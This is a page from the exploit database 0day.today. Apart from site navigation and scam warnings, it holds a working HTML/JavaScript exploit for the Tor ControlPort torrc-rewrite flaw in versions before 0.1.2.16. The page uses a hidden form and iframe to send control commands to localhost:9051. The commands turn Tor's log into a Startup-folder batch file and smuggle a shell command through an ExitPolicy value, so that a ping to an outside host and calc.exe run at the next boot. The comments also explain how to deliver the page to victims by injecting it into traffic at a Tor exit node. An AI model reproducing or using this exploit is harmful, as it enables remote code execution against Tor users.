0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit
================================================= Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit ================================================= <!-- Tor < 0.1.2.16 with ControlPort enabled ( not default ) Exploit for Tor ControlPort "torrc" Rewrite Vulnerability http://secunia.com/advisories/26301 Rewrites the torrc to log to a different location: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\t.bat Also enables debug logging, and an erroneous ExitPolicy looking something like this: reject*:1337\'&' calc.exe this will output: [debug] parse_addr_policy(): Adding new entry 'reject*:1337'& calc.exe to the debug log -> t.bat which will run calc.exe on next boot. This is not very silent though, t.bat will contain something like 45 rows of crap which the user will see in about 1 sec, drop me a mail if you have a better way. Either have a TOR user visit this HTML or inject it into her traffic when you're a TOR exit. If you inject, just replace </HEAD> with everything in <HEAD> + </HEAD> ( that's why I tried to fit everything inside <HEAD />), and fix Content-Length // elgCrew _AT_ safe-mail.net --> <html> <head> <script language="javascript"> window.onload = function() { cmd = 'cls & echo off & ping -l 1329 my.tcpdump.co -n 1 -w 1 > NUL & del t.bat > NUL & exit'; inject = '\r\nAUTHENTICATE\r\nSETCONF Log=\"debug-debug file C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\t.bat\"\r\nSAVECONF\r\nSIGNAL RELOAD\r\nSETCONF ExitPolicy=\"reject*:1337\\\'&' + cmd + '&\"\r\nSETCONF Log=\"info file c:\\\\tor.txt\"\r\nSAVECONF\r\nSIGNAL RELOAD\r\n'; form51.area51.value = inject; document.form51.submit(); } </script> <form target="hiddenframe" name="form51" action="http://localhost.mil.se:9051" method=POST enctype="multipart/form-data"> <input type=hidden name=area51> </form> <iframe width=0 height=0 frameborder=0 name="hiddenframe"></iframe> </head> <body> <pre> ---- | y0! | ---- \ \_\_ _/_/ \ (oo)\_______ |_|\ )* ||----w | || || </pre> </body> </html> # 0day.today [2024-12-25] #